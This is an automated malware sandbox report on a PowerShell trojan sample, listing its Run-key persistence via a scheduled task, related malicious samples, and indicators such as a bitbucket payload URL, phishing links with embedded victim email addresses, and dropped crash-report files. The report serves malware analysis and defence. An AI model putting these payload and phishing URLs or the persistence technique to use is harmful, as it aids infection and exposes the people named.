Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	atomxml.ps1
Detection:	MAL
Classification:	mal100.troj.evad.winPS1@36/26@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 52% Number of executed functions: 73 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 199.232.210.172, 192.229.221.95, 13.85.23.206, 52.165.164.15, 20.190.159.64, 40.126.31.69, 40.126.31.73, 40.126.31.71, 40.126.31.67, 20.190.159.71, 20.190.159.2, 20.190.159.23, 104.208.16.94, 13.107.246.45
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
Execution Graph export aborted for target fontdrvhost.exe, PID 4092 because there are no executed function
Execution Graph export aborted for target fontdrvhost.exe, PID 5808 because there are no executed function
Execution Graph export aborted for target mshta.exe, PID 6672 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:54:03	API Interceptor	219x Sleep call for process: powershell.exe modified
07:55:23	API Interceptor	4x Sleep call for process: dw20.exe modified
12:55:20	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Uplatil-119 schtasks /run /tn Uplatil-119
12:55:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Uplatil-119 schtasks /run /tn Uplatil-119

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.166.143.48	http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt	Get hash	malicious	Unknown	Browse	bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	Payment-Order #24560274 for 8,380 USD.exe	Get hash	malicious	XWorm	Browse	13.107.246.45
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	13.107.246.45
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	Subscription_Renewal_Invoice_2025_HKVXTC.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	13.107.246.45
	7ccf88c0bbe3b29bf19d877c4596a8d4.zip	Get hash	malicious	Unknown	Browse	13.107.246.45
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	13.107.246.45
	https://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	Sburkholder.pdf	Get hash	malicious	Unknown	Browse	13.107.246.45
bitbucket.org	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.49
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.50
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.50
	https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63a%2F3274607708%2FSmartadvocate%2F%23%3Fnl=ZGF5aGFuYXJhQHNtYXJ0YWR2b2NhdGUuY29t/1/010901943144e678-be97f397-fbf4-4935-81cc-f9ffe0e007ba-000000/Ra9zEF9F5Gh7LdH-GSmxaBW3ylU=188	Get hash	malicious	ScreenConnect Tool	Browse	185.166.143.49
	https://g248jqtc.r.ap-south-1.awstrack.me/L0/https:%2F%2Ffub.direct%2F1%2Fwpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4WwWGYEcIFo0NTTfcu_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE%2Fhttps%2Fwestcommerce.com.br%2Fe63i%2F7286520054%2FMackietransportation%2F%23%3Fnl=ZGVhbi5tYWNraWVAbWFja2lldHJhbnNwb3J0YXRpb24uY29t/1/010901943411f671-14b57a2c-4586-496c-a061-2f25bd5eed26-000000/5tAc1I97hb2OTOUlpCX6bWWJ9hY=188	Get hash	malicious	ScreenConnect Tool	Browse	185.166.143.48
	malware.bat	Get hash	malicious	PureLog Stealer, RHADAMANTHYS	Browse	185.166.143.50
	3lhrJ4X.exe	Get hash	malicious	LiteHTTP Bot	Browse	185.166.143.48
	1111.hta	Get hash	malicious	Unknown	Browse	185.166.143.50
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	185.166.143.49
	Epsilon.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
bg.microsoft.map.fastly.net	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.232.214.172
	Payment-Order #24560274 for 8,380 USD.exe	Get hash	malicious	XWorm	Browse	199.232.214.172
	PEDIDO DE COMPRAS OC 1203 CRI234.xlsx.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	199.232.210.172
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	199.232.214.172
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	e-SPT Masa PPh.exe	Get hash	malicious	BlackMoon	Browse	199.232.210.172
	e-SPT Masa PPh.exe	Get hash	malicious	BlackMoon	Browse	199.232.210.172
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	199.232.214.172
	I6la3suRdt.exe	Get hash	malicious	AsyncRAT	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	06012025_1416_bombastic.hta	Get hash	malicious	Branchlock Obfuscator	Browse	52.216.220.130
	malw.hta	Get hash	malicious	Unknown	Browse	54.231.132.66
	http://www.hillviewlodge.hotelrent.top	Get hash	malicious	Unknown	Browse	18.245.31.129
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	52.222.232.30
	https://wetransfert-devis-factgfd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	18.245.60.5
	mail (4).eml	Get hash	malicious	Unknown	Browse	52.29.116.175
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.50
	https://www.dollartip.info/neuro	Get hash	malicious	Unknown	Browse	3.167.227.123
	https://url12.mailanyone.net/scanner?m=1tUshS-0000000041D-2l2S&d=4%7Cmail%2F90%2F1736191200%2F1tUshS-0000000041D-2l2S%7Cin12g%7C57e1b682%7C21208867%7C12850088%7C677C2DBECB224D1EED07A26760DE755E&o=%2Fphtp%3A%2Fjtssamcce.ehst.uruirrevam.ctstro%2Fe%3D%2F%3Fixprceetmeat%3Dmn%26aeileplttm%26920%3D09s1-oFmyiSNtMTnafi%25iosctgp40norajmcm.c8p%3D5o%26991dd-86e2ee-4a-9879e6-de5f1dd.%232e.%3D302vp%3D0%26%25ttsdhF23Ap%252a%25Fuii.ctr.vro2omastr%25Fi2ge2ap%25%25FelFp%25cisoie52F21d9c876-89-4e9dd8-9d-d6ea215f22e%25eeFtFde%252maadata%3Da%26kdtuK8rJIg9jKP6GiBXfDGI7Fp%25Lddn2sRxJdhuPpjWD3%25ICb37&s=3NJIrjRA01UUg3P9bWqXPHrWXdk	Get hash	malicious	Unknown	Browse	13.32.121.31
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	QUOTATION - RFQ2496_PO 08775622879.pdf(87kb).com.exe	Get hash	malicious	Quasar	Browse	185.166.143.48 142.250.185.225
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.166.143.48 142.250.185.225
	174.exe	Get hash	malicious	Xmrig	Browse	185.166.143.48 142.250.185.225
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	185.166.143.48 142.250.185.225
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.48 142.250.185.225
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.48 142.250.185.225
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.166.143.48 142.250.185.225
	c2.hta	Get hash	malicious	Remcos	Browse	185.166.143.48 142.250.185.225
	http://xyft.zmdusdxj.ru	Get hash	malicious	Unknown	Browse	185.166.143.48 142.250.185.225

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_e703175c-856a-4b57-b870-b529f490df7e\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8028050772212488
Encrypted:	false
SSDEEP:	96:zmGTFoneaAu6XRs9lAzxOMb5dQXIFdk+BHUHZopAnQHdE7HeSVcf+xnj+dF9yOyL:xmne3u6XRH0ia5m9TMlzuiFctZ24IO8
MD5:	1F9595118BA27422FE3C20615C474917
SHA1:	381EDA5237494EE607B743BC69D56761E9CD911D
SHA-256:	AF60BA4AE645B10666E4594585D60DC0F0A9821138EC01E907A812CABCDD9C5F
SHA-512:	5EBA2E1FF7EB32A7FD721AAAD7271A86D72A21EE8ABB21713C45B675239160A00DE182303E5A3006AE60B77063DD066C4597B6DE92AE6D8B4ABF1EEF8937B3A1
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.1.4.5.0.9.0.1.1.0.5.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.1.4.5.1.0.2.7.6.6.9.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.0.3.1.7.5.c.-.8.5.6.a.-.4.b.5.7.-.b.8.7.0.-.b.5.2.9.f.4.9.0.d.f.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.4.-.5.c.c.8.-.4.7.8.b.c.c.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_f367fb30-4a6d-4729-a18a-0a24b90a8c50\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8026433455423433
Encrypted:	false
SSDEEP:	96:zvGBFJMeaAu6ORs9lAzxOMb5dQXIFdk+BHUHZopAnQHdE7HeSVcf+xnj+dF9yOyL:AbMe3u6ORH0ia5m9TMlzuiFctZ24IO8
MD5:	88DC1D21C818E64C12EDE1103776384E
SHA1:	57C7354C5BCFEF811ED166D9C886AB2B3E104B24
SHA-256:	21F50F5C021E40E852DBD6D39D3C10157D8ED0AC4EECCC2583ADFB6E90C47FC6
SHA-512:	B44B029C8C7F3BEB777D4252CFD1EA89AB908643764D422D187DF4E7D3592F87C44518471DBCB6F0D594A7800535AC20C19F0209BD82D0E9F3465A1436E03D48
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.1.4.5.0.8.3.7.9.2.7.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.1.4.5.1.0.1.6.0.5.2.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.6.7.f.b.3.0.-.4.a.6.d.-.4.7.2.9.-.a.1.8.a.-.0.a.2.4.b.9.0.a.8.c.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.6.c.-.0.0.0.1.-.0.0.1.4.-.7.7.b.c.-.3.b.8.b.c.c.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_598857dc-8512-453a-af65-151ce81ace18\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8908761695156544
Encrypted:	false
SSDEEP:	192:GRLJf64RiD0wVZa5m9TMVBobzuiFctZ24IO8Z:ktVR8HaAzuiFctY4IO8
MD5:	9736BAA06CCFCE8F845E2D26F77BC4B0
SHA1:	7C160B143E45332A7DF8F3E7F5284FAE3FFAAC5E
SHA-256:	6B3B83D79D4ED1AA4A3B816E64DBD933E2BE09B07D4ED35912D8AFAB6E79B24B
SHA-512:	CCBF9E3EEA6EB9D1D666E6F853E2BA617731C1F55512B9C24821F44E7E217027B989D0F64DFEB4D5DF09F5246EE19B3E8EF8ACCAE1CE3C1E022BCC9609CCF0C6
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.1.4.5.0.7.9.1.1.2.0.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.1.4.5.1.0.2.3.9.3.3.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.8.8.5.7.d.c.-.8.5.1.2.-.4.5.3.a.-.a.f.6.5.-.1.5.1.c.e.8.1.a.c.e.1.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.4.0.-.0.0.0.1.-.0.0.1.4.-.e.b.b.5.-.3.0.8.b.c.c.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.6.f.a.7.2.6.f.c.8.4.f.d.4.6.d.0.3.d.d.3.c.3.2.6.8.9.f.6.4.5.e.0.4.2.2.2.7.8.!.R.e.g.S.v.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.9.:.0.1.:.0.0.!.1.5.0.b.1.!.R.e.g.S.v.c.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_e0ec688a-ee3f-4ab9-b88a-f6cbb51d4565\Report.wer

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8911049293022741
Encrypted:	false
SSDEEP:	192:XuTJf6BRiD0wVZa5m9TMVBobzuiFctZ24IO8Z:eVMR8HaAzuiFctY4IO8
MD5:	1568553C4121DEC7F8886940F4CC356A
SHA1:	52F1DB09DF679A90A4B2C463BAF32DF430760518
SHA-256:	B339FC463E3F1159A65C23916775A6B258311448BF78E4318F32D1FE80039D3B
SHA-512:	11534A12F46C2DAF5506E43626B3521A7916F8EE42B67E5937A22D0610E4D970CD89993437F8BCA171A54848C05DB12FB480D0AC4798C857A418812016C92FC0
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.8.1.4.5.0.8.7.5.4.4.4.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.8.1.4.5.1.0.2.0.7.5.9.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.e.c.6.8.8.a.-.e.e.3.f.-.4.a.b.9.-.b.8.8.a.-.f.6.c.b.b.5.1.d.4.5.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.5.0.-.0.0.0.1.-.0.0.1.4.-.f.f.a.e.-.3.5.8.b.c.c.6.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.6.f.a.7.2.6.f.c.8.4.f.d.4.6.d.0.3.d.d.3.c.3.2.6.8.9.f.6.4.5.e.0.4.2.2.2.7.8.!.R.e.g.S.v.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.9.:.0.1.:.0.0.!.1.5.0.b.1.!.R.e.g.S.v.c.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAD9.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7622
Entropy (8bit):	3.705137948176644
Encrypted:	false
SSDEEP:	192:R6l7wVeJsK6ckQwe6YgSSU9cgmfpgCpp1F91fZZXm:R6lXJZ6O6YVSUmgmfaC1F/fZE
MD5:	A9FD5557DAEED766D3C6BA78EFAE65DF
SHA1:	5CDE2CAC4E6E5BCF1EE0DA1CDB293CC90025C66F
SHA-256:	D5734F82948A4753DD427A5D605DF3B3F014830341BAB73EA6517C37881ED7F0
SHA-512:	9C0793BA8CF6EE9C14E89060703C9038D77ABF0812BCBA970E93BBDF4265D5D47F0A5A89371E4E0B50F466B0CB11E5AD9402AD7B56DC517DF51FE48302F6450B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.0.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD2B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7624
Entropy (8bit):	3.7061516849057408
Encrypted:	false
SSDEEP:	192:R6l7wVeJZ3656YgKSU9cgmf9Cpp1Fb1fNXm:R6lXJp656YdSUmgmf9C1FpfQ
MD5:	7665C09C5401AEDB0EADEC5AD1DC45BD
SHA1:	800A39D823029B401646778C18A837A1A0E13F9A
SHA-256:	524DC514C60BB530FE48341AFF89DFDD0A654B4AA7F1DA035B1A0AB7BF349A86
SHA-512:	0B111E56A1EB2E8D286946AF2DB8539C1AC81C0D5D873DDF280A2869DC5D8F256A400CF9CCFB8F38ED4971E75301DBBC43C985C9CC0C11D4DAC51263CD8F7418
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD4B.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4614
Entropy (8bit):	4.487020091902628
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9puWpW8VYqYm8M4JFKfVxiF7+q8YsahGq8dGd:uIjfxI7bP7V+JFKH4Jxh58dGd
MD5:	56BE68073C90EAEEAC51EA9F3EE04B57
SHA1:	5DB202F572126D4A74AF6BB676D661BD1FEAE46F
SHA-256:	430082C39BECBA3DB5A5A836002C43A119CE8B6E1B648D56B194D016B680B4D7
SHA-512:	1252E31F704F759DF973D93EAEE71E5DAC16700B722A8F10F1F2146FA8C10A371C7EB6DC702943627BAF64FF234BDED7792E5926CFFF20D3CEAC57385CC25030
Malicious:	false
